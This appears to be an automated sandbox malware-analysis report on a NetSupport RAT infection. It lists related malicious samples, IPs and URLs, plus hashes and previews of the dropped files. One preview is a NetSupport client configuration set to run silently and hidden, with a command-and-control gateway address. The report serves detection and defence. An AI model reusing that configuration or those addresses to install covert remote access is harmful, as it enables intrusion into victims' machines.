                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          172.67.68.21272BF1aHUKl.msiGet hashmaliciousNetSupport RATBrowse
                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                          https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                          file.exeGet hashmaliciousNetSupport RATBrowse
                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                          https://inspyrehomedesign.com/Ray-verify.htmlGet hashmaliciousNetSupport RATBrowse
                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                          file.exeGet hashmaliciousNetSupport RATBrowse
                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                          SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                                                          • geo.netsupportsoftware.com/location/loca.asp

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          geo.netsupportsoftware.comd1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeGet hashmaliciousNetSupport RATBrowse
                                                                          • 104.26.0.231
                                                                          d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeGet hashmaliciousNetSupport RATBrowse
                                                                          • 104.26.1.231
                                                                          file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                                          • 104.26.0.231
                                                                          5j0fix05fy.jsGet hashmaliciousNetSupport RATBrowse
                                                                          • 104.26.0.231
                                                                          Merge.exeGet hashmaliciousNetSupport RATBrowse
                                                                          • 104.26.1.231
                                                                          lFxGd66yDa.exeGet hashmaliciousNetSupport RATBrowse
                                                                          • 104.26.0.231
                                                                          Jjv9ha2GKn.exeGet hashmaliciousNetSupport RAT, DarkTortillaBrowse
                                                                          • 104.26.0.231
                                                                          5q1Wm5VlqL.exeGet hashmaliciousNetSupport RATBrowse
                                                                          • 104.26.1.231

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          MEER-ASmeerfarbigGmbHCoKGDEhttps://laserglow-technologies-industrial-48815730.hubspotpagebuilder.com/laserglowGet hashmaliciousHTMLPhisherBrowse
                                                                          • 80.77.25.196
                                                                          Fantazy.spc.elfGet hashmaliciousUnknownBrowse
                                                                          • 5.1.66.185
                                                                          payload.exeGet hashmaliciousMetasploitBrowse
                                                                          • 45.155.249.178
                                                                          test1.ps1Get hashmaliciousUnknownBrowse
                                                                          • 45.155.249.178
                                                                          uC4EETMDcz.exeGet hashmaliciousSystemBCBrowse
                                                                          • 45.155.249.199
                                                                          cNF6fXdjPw.dllGet hashmaliciousSocks5SystemzBrowse
                                                                          • 45.155.250.225
                                                                          x86_64.elfGet hashmaliciousUnknownBrowse
                                                                          • 45.90.96.167
                                                                          arm.elfGet hashmaliciousUnknownBrowse
                                                                          • 45.90.96.167
                                                                          spc.elfGet hashmaliciousMiraiBrowse
                                                                          • 45.90.96.167
                                                                          CLOUDFLARENETUShttp://vionicstore.shopGet hashmaliciousUnknownBrowse
                                                                          • 104.18.73.116
                                                                          http://yourexcellency.activehosted.comGet hashmaliciousUnknownBrowse
                                                                          • 104.17.25.14
                                                                          https://www.xrmtoolbox.com/Get hashmaliciousUnknownBrowse
                                                                          • 172.67.197.240
                                                                          mWAik6b.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                          • 172.67.150.129
                                                                          https://mercedesinsua.com.ar/?infox=Ymxha2Uuc2lyZ29AY290ZXJyYS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                          • 188.114.96.3
                                                                          http://secure.ezpassbgy.top/payGet hashmaliciousUnknownBrowse
                                                                          • 104.21.15.205
                                                                          https://2ol.itectaxice.ru/Qm75/Get hashmaliciousUnknownBrowse
                                                                          • 104.17.25.14
                                                                          m68k.elfGet hashmaliciousUnknownBrowse
                                                                          • 172.68.102.177
                                                                          https://forms.office.com/e/xknrfCPQkRGet hashmaliciousHTMLPhisherBrowse
                                                                          • 188.114.96.3
                                                                          TVHORADADAEShttps://gthlcanada.comGet hashmaliciousUnknownBrowse
                                                                          • 185.76.79.50
                                                                          http://indyhumane.orgGet hashmaliciousUnknownBrowse
                                                                          • 185.76.79.50
                                                                          garm7.elfGet hashmaliciousMiraiBrowse
                                                                          • 156.67.60.69
                                                                          goarm7.elfGet hashmaliciousMiraiBrowse
                                                                          • 156.67.60.72
                                                                          nrsh4.elfGet hashmaliciousMiraiBrowse
                                                                          • 156.67.60.72
                                                                          eppc.elfGet hashmaliciousMiraiBrowse
                                                                          • 156.67.60.30
                                                                          lDO4WBEQyL.exeGet hashmaliciousGO BackdoorBrowse
                                                                          • 185.157.213.253
                                                                          nshsh4.elfGet hashmaliciousMiraiBrowse
                                                                          • 156.67.60.38
                                                                          https://agradeahead.com/Get hashmaliciousUnknownBrowse
                                                                          • 185.76.79.50

                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          C:\ProgramData\i99ekubc\HTCTL32.DLL5j0fix05fy.jsGet hashmaliciousNetSupport RATBrowse
                                                                            Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                              hkpqXovZtS.exeGet hashmaliciousNetSupport RATBrowse
                                                                                Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                  update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                    Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                      update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                        updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                                          updates.jsGet hashmaliciousNetSupport RATBrowse

                                                                                            Created / dropped Files

                                                                                            C:\ProgramData\i99ekubc.zip

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                            Category:dropped
                                                                                            Size (bytes):2845498
                                                                                            Entropy (8bit):7.997717653428638
                                                                                            Encrypted:true
                                                                                            SSDEEP:49152:b7X1ZldlEDThXBJOhHyx6J6h2SFFGf0RBNTQfYc9jh23eWeB3/YSBm7WIqRpykTo:X1wFXa4hRFY89YYc9jh23redpmQRZCP7
                                                                                            MD5:4C1AFE882E6D7C945A8397DCB02A2478
                                                                                            SHA1:85BA754BB1515A1EDC4054A8A3396C238DCE2B7E
                                                                                            SHA-256:67F6FC03CD53FB2A5AB17B97CAAE29B4FD0E0AFB7ADF4C9C64CDB2F7F99D03D4
                                                                                            SHA-512:A1778AE5F89DBBC57AC70C8A8B1CC419DFE015C7F9C9A58AC9957AB3723EDF812A4681CAF167EC63D0EA571448DC01FE01E5B12C5538C98B6BA404CAD2F79B0F
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:PK........Dw*Z................install/PK.........P)Z..Q~....|.......install/5B8FEB2AF817493Es.....TDF$QrL....`.G..l5...J.0...T.R..COg..........:...7<-.#....Q ...(....Me......I.T%Q.....}H.;....3K..pM..j+..JJ..).Q~..x?..D.e..&~..f.....(.n!.v.3.o.j...%{.....b...>..y....z...........z...E>......HJD.A.]..y.{~.wx..^U.<.w.L..~..j..[.h<:.,...b.....yb....Y...`Y..0.F....Y...\.......FJ....c....{..ne..!..89...Z.......a*si........]....N.M.Dy;RD[...m#?..\. d........w..T.P...`G...V..q.Pd..g.. 8[....2^..~4#^.k..S.5...{{.)W.2.&..P.G1L^Y.'.Q..t/...~#~z.9...:.....;t..I...b.gd ...T....#.....?A...~.f.%..U...B./.........g?7d.$.).....{B..#.E....4.N....:...mM.].LDw.C.A.7.z..)R.qi-..j.~3E....e+.q2...}'.{.."'.W.....{]|.gK..yA..;.x.2..Y..x..iP.J.I....]........;..TK..%.b...z.+.a....Q...$..r.MNL...@.S.4;...a.n.Om=....oCm,`o...Q.(......&.p.T.Y..........p..<a.#x.hQ.C.N"iu..f..A.#..CS.43N..t.Hcg....|..t......&8u....xL.Y$.)..Z4At...W.*.....Z*..z7.'2.m...ZO...)..w ..:.L.gp.....y...6

                                                                                            C:\ProgramData\i99ekubc\HTCTL32.DLL

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):328056
                                                                                            Entropy (8bit):6.7547459359511395
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:Hib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OKB:Hib5YbsXioEgULFpSzya9/lY5SilQCfR
                                                                                            MD5:C94005D2DCD2A54E40510344E0BB9435
                                                                                            SHA1:55B4A1620C5D0113811242C20BD9870A1E31D542
                                                                                            SHA-256:3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                                                                            SHA-512:2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\i99ekubc\HTCTL32.DLL, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 16%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: 5j0fix05fy.js, Detection: malicious, Browse
                                                                                            • Filename: Update.js, Detection: malicious, Browse
                                                                                            • Filename: hkpqXovZtS.exe, Detection: malicious, Browse
                                                                                            • Filename: Update.js, Detection: malicious, Browse
                                                                                            • Filename: update.js, Detection: malicious, Browse
                                                                                            • Filename: Update.js, Detection: malicious, Browse
                                                                                            • Filename: update.js, Detection: malicious, Browse
                                                                                            • Filename: updates.js, Detection: malicious, Browse
                                                                                            • Filename: updates.js, Detection: malicious, Browse
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......._....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\i99ekubc\NSM.LIC

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):195
                                                                                            Entropy (8bit):4.924914741174998
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:O/oPITDKHMoEEjLgpVUK+Odfu2M0M+ZYpPM/iotqO2La8l6i7s:XAyJjjqVUKHdW2MdRPM/iotq08l6J
                                                                                            MD5:E9609072DE9C29DC1963BE208948BA44
                                                                                            SHA1:03BBE27D0D1BA651FF43363587D3D6D2E170060F
                                                                                            SHA-256:DC6A52AD6D637EB407CC060E98DFEEDCCA1167E7F62688FB1C18580DD1D05747
                                                                                            SHA-512:F0E26AA63B0C7F1B31074B9D6EEF88D0CFBC467F86B12205CB539A45B0352E77CE2F99F29BAEAB58960A197714E72289744143BA17975699D058FE75D978DFD0
                                                                                            Malicious:false
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:1200..0x3ca968c5....[[Enforce]]....[_License]..control_only=0..expiry=01/01/2028..inactive=0..licensee=XMLCTL..maxslaves=9999..os2=1..product=10..serial_no=NSM303008..shrink_wrap=0..transport=0..

                                                                                            C:\ProgramData\i99ekubc\NSM.ini

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:Generic INItialization configuration [Features]
                                                                                            Category:dropped
                                                                                            Size (bytes):6458
                                                                                            Entropy (8bit):4.645519507940197
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
                                                                                            MD5:88B1DAB8F4FD1AE879685995C90BD902
                                                                                            SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                                                                            SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                                                                            SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                                                                            Malicious:false
                                                                                            Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t

                                                                                            C:\ProgramData\i99ekubc\PCICHEK.DLL

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):18808
                                                                                            Entropy (8bit):6.292094060787929
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:dogL7bo2t6n76RRHirmH/L7jtd3hfwjKd3hfwB7bjuZRvI:dogL7bo2YrmRTAKT0iTI
                                                                                            MD5:104B30FEF04433A2D2FD1D5F99F179FE
                                                                                            SHA1:ECB08E224A2F2772D1E53675BEDC4B2C50485A41
                                                                                            SHA-256:956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                                                                            SHA-512:5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\i99ekubc\PCICHEK.DLL, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 18%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yu....i...i...i.......i..Z...i.......i......i......i..l....i...h.~.i......i......i......i.......i.Rich..i.................PE..L....A.W...........!......................... ...............................`.......U....@.........................@#..r...h!..P....@............... ..x)...P......P ............................... ..@............ ..D............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\i99ekubc\PCICL32.DLL

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):3740024
                                                                                            Entropy (8bit):6.527276298837004
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:0KJKmPEYIPqxYdoF4OSvxmX3+m7OTqupa7HclSpTAyFMJa:0KJ/zIPq7F4fmXO8u6kS+y/
                                                                                            MD5:D3D39180E85700F72AAAE25E40C125FF
                                                                                            SHA1:F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
                                                                                            SHA-256:38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
                                                                                            SHA-512:471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\ProgramData\i99ekubc\PCICL32.DLL, Author: Joe Security
                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\i99ekubc\PCICL32.DLL, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 18%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J.>N+.mN+.mN+.m.eAmL+.mU.Gmd+.m!]rmF+.mU.EmJ+.mGSZmA+.mGS]mO+.mGSJmi+.mN+.m.(.mU.rm.+.mU.sm.+.mU.BmO+.mU.CmO+.mU.DmO+.mRichN+.m........................PE..L......X...........!.....(...$ .............@................................9.....Y.9.............................p................p................8.x)...`7.p....Q.......................c......@c..@............@..(.......`....................text...l'.......(.................. ..`.rdata..s....@.......,..............@..@.data....%... ......................@....tls.........P......................@....hhshare.....`......................@....rsrc........p......................@..@.reloc...3...`7..4....6.............@..B................................................................................................................................................................................................

                                                                                            C:\ProgramData\i99ekubc\TCCTL32.DLL

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):396664
                                                                                            Entropy (8bit):6.80911343409989
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:HqArkLoM/5iec2yxvUh3ho2LDnOQQ1k3+h9APjbom/n6:ekuK2XOjksobom/n6
                                                                                            MD5:2C88D947A5794CF995D2F465F1CB9D10
                                                                                            SHA1:C0FF9EA43771D712FE1878DBB6B9D7A201759389
                                                                                            SHA-256:2B92EA2A7D2BE8D64C84EA71614D0007C12D6075756313D61DDC40E4C4DD910E
                                                                                            SHA-512:E55679FF66DED375A422A35D0F92B3AC825674894AE210DBEF3642E4FC232C73114077E84EAE45C6E99A60EF4811F4A900B680C3BF69214959FA152A3DFBE542
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\i99ekubc\TCCTL32.DLL, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L....8.W...........!................'................................................P....@.............................o...D...x....0..@...............x)...@..\E..................................Pd..@...............h............................text............................... ..`.rdata..............................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc...F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\i99ekubc\client32.exe

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):103824
                                                                                            Entropy (8bit):6.674952714045651
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:q78j0+RH6e6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDU:qwpHLiLniepfxP91/bQxnu
                                                                                            MD5:C4F1B50E3111D29774F7525039FF7086
                                                                                            SHA1:57539C95CBA0986EC8DF0FCDEA433E7C71B724C6
                                                                                            SHA-256:18DF68D1581C11130C139FA52ABB74DFD098A9AF698A250645D6A4A65EFCBF2D
                                                                                            SHA-512:005DB65CEDAACCC85525FB3CDAB090054BB0BB9CC8C37F8210EC060F490C64945A682B5DD5D00A68AC2B8C58894B6E7D938ACAA1130C1CC5667E206D38B942C5
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\i99ekubc\client32.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 32%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L....iMR.....................v...... ........ ....@.................................<h....@.................................< ..<....0...q...........|.............. ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....q...0...r..................@..@.reloc..l............z..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\i99ekubc\client32.ini

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):676
                                                                                            Entropy (8bit):5.438750337777859
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:XWJxS2hz7YU+Sj8ZGShR8kkivlnxOZ7+DP981E7GXoKIDWQCYnmSu+L8AR:XWJI2hzEPI8ZNR8pivlnxOoG1fXtID/F
                                                                                            MD5:95C974137591C8018AC92DEA29AA416C
                                                                                            SHA1:E0808277D7FED2B4DB1176FA4FA79DA420BFD865
                                                                                            SHA-256:7F92999396927D24370F6FE3D2E8EA408C9917D34F42C0205EA3F3296B6C04F4
                                                                                            SHA-512:767AE7FFCA47BB8F8170C44C66EEBF9623412A5D2E07D67FC3FCF1AB5F6CE49C08A68D91E00EBD0B52C052AD5454E57B16A28BAED8B1E0B2C585448EAE8AE1E0
                                                                                            Malicious:false
                                                                                            Preview:0x33b1a391....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableManageServices=0..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..silent=1..SKMode=1..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0....[HTTP]..GatewayAddress=185.157.213.71:443..gsk=FI:N>AABED9I<L?N..gskmode=0..GSK=FI:N>AABED9I<L?N..GSKX=FI:N>AABED9I<L?N..

                                                                                            C:\ProgramData\i99ekubc\guarantee\14844_13380793255498334.pma

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):576
                                                                                            Entropy (8bit):3.74490007255712
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:bHCsUaXhIi90pgIJKlkQIkzDTze/W2rXJ0cl/7:biERIiMdMkvkm/WgXW07
                                                                                            MD5:0DDC9B893EA3AF54D152F94410653A9D
                                                                                            SHA1:3C7E16964DFFD7342AE931E38E00F67DC0E4C307
                                                                                            SHA-256:0128461FAC52A5DEEC5B0F0410928E0C2AFC1AB710990BDEDEA47A68EB5ECC3D
                                                                                            SHA-512:24463708FBDACFF90FCB4964A6335687D8EEB49094E6154D0AA37FD9E8DE7D870396E424756465F4F86EDF0BAA6138B7F52035559A04FB243C29D42395AE92A2
                                                                                            Malicious:false
                                                                                            Preview:...@....................@...............@...X...............`... ...i.y.........SetupMetrics........i.y..Yd.X.......A.......e............,.........C*.3...................C*.3................UMA.PersistentAllocator.SetupMetrics.UsedPct....h...i.y.[".................................!...&...+...0...6...;...@...E...K...P...U...Z...`...e...........i.y..Yd.0.......A...................a.#........z..?...................z..?................Setup.Install.LzmaUnPackStatus_SetupExePatch....X...i.y.[".............................................................................

                                                                                            C:\ProgramData\i99ekubc\guarantee\17680_13380946966794438.pma

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1696
                                                                                            Entropy (8bit):4.244464042583567
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:bixIiMdMA/JWo/XkWHUVyHBF+J4X8XRL1g:bi4MQgW8yByv
                                                                                            MD5:3E4B8369C88B5B5561EF39F297AE5B7E
                                                                                            SHA1:128D40127E1BCD1DC3A26DF7ED685AD95482F2EA
                                                                                            SHA-256:3774458149778D9527E0A9ACE07B42EF609F0BB1E856E6C2DFD0B7CBD8B09F73
                                                                                            SHA-512:65C3DC909AA69121EF46A79D8F62D234D69B5856796FDD5F4AE4FC030BC0FB953175577CC34B41B38E2C39D44CBCB97DD34628C074B74C189CFD522B57602F2C
                                                                                            Malicious:false
                                                                                            Preview:...@....................@...................................`... ...i.y.........SetupMetrics........i.y..Yd.X.......A.......e............,.........C*.3...................C*.3................UMA.PersistentAllocator.SetupMetrics.UsedPct....h...i.y.[".................................!...&...+...0...6...;...@...E...K...P...U...Z...`...e...........i.y..Yd.H.......A...................a.#.....y....)..................y....)..................Setup.Install.LzmaUnPackStatus_CompressedChromeArchive..X...i.y.[".................................................................................i.y..Yd.........A...................a.#.........]l....................]l................Setup.Install.LzmaUnPackStatus_UncompressedChromeArchive........x...i.y..Yd........A.......P...Q...`...l..?....]......Q................]......Q................Setup.Install.Result....X...i.y.[".............................................................................................................................

                                                                                            C:\ProgramData\i99ekubc\guarantee\2176_13380946966665858.pma

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):344
                                                                                            Entropy (8bit):3.4385863420423908
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:bHCsLlXj9IiIwkttBtw++CMwCkXxL4bM5/zGJOg4lTQwlroL:bHCsRXhIiq50pgIJKlkQY
                                                                                            MD5:1B7CDDDFB06152AE01F12D9F253237D6
                                                                                            SHA1:1EF358781A086A0727F4FA95CD53510EB328BC52
                                                                                            SHA-256:FD668D6EDCF6B6CC176EDD9BF7B0D7F1881FE2F0D94EBAE656127C27A359550E
                                                                                            SHA-512:4705C93B233BE92DD2D04649D404B538BC76607BBE655D5E35A739653AC1AF776ECDD12EC1CBF81476070EC5BAE633F891817155014730A06939EFB21BD132EA
                                                                                            Malicious:false
                                                                                            Preview:...@....................@...............X...`...............`... ...i.y.........SetupMetrics........i.y..Yd.0.......A.......e............,.........C*.3...................C*.3................UMA.PersistentAllocator.SetupMetrics.UsedPct....h...i.y.[".................................!...&...+...0...6...;...@...E...K...P...U...Z...`...e.......

                                                                                            C:\ProgramData\i99ekubc\guarantee\camera_mf_trace.wprp

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):24910
                                                                                            Entropy (8bit):5.246760185320695
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:PlBJHEA29f27X0JS4zuPxpO8psP+E7v6xKL:P9b29f27kJSAuPxpO6sP+E7yxKL
                                                                                            MD5:8028AB84D61FC5E00FEEA816E1D1E293
                                                                                            SHA1:73F6340BE4C6B5AF09673DACDF1AAB7405B966AA
                                                                                            SHA-256:3F2EB6455F54365C27829F85DD64CA0BAFAA8577A6C8E79A54A6DD4C67DF6470
                                                                                            SHA-512:276DF846F72F2B410852F0709F3EFFD853C3B012E94A6A3DFFB364F9597D4CCFE453B6533CE7A67C9DCE5B829C0F96E9838A267269687213D996B60591C586F0
                                                                                            Malicious:false
                                                                                            Preview:<?xml version="1.0" encoding="utf-8" standalone="yes"?>..<WindowsPerformanceRecorder Version="1.0" Author="Microsoft Corporation" Comments="MF tracing profile" Company="Microsoft Corporation" Copyright="Microsoft Corporation" Tag="MFTrace">.. <Profiles>.. <EventCollector Id="EventCollector_Camera_MF_Trace" Name="MFTrace Event Collector">.. <BufferSize Value="1024" />.. <Buffers Value="3" PercentageOfTotalMemory="true" MaximumBufferSpace="192" />.. </EventCollector>.. <EventProvider Id="AuthUX_1" Name="3ec987dd-90e6-5877-ccb7-f27cdf6a976b" />.. <EventProvider Id="AuthUX_2" Name="41ad72c3-469e-5fcf-cacf-e3d278856c08" />.. <EventProvider Id="AuthUX_3" Name="4f7c073a-65bf-5045-7651-cc53bb272db5" />.. <EventProvider Id="AuthUX_4" Name="a6c5c84d-c025-5997-0d82-e608d1abbbee" />.. <EventProvider Id="AuthUX_5" Name="c0ac3923-5cb1-5e37-ef8f-ce84d60f1c74" />.. <EventProvider Id="AuthUX_6" Name="df350158-0f8f-555d-7e4f-f1151ed14299" />.. <EventProvider Id="Aut

                                                                                            C:\ProgramData\i99ekubc\guarantee\external_extensions.json

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):291
                                                                                            Entropy (8bit):4.678249360262278
                                                                                            Encrypted:false
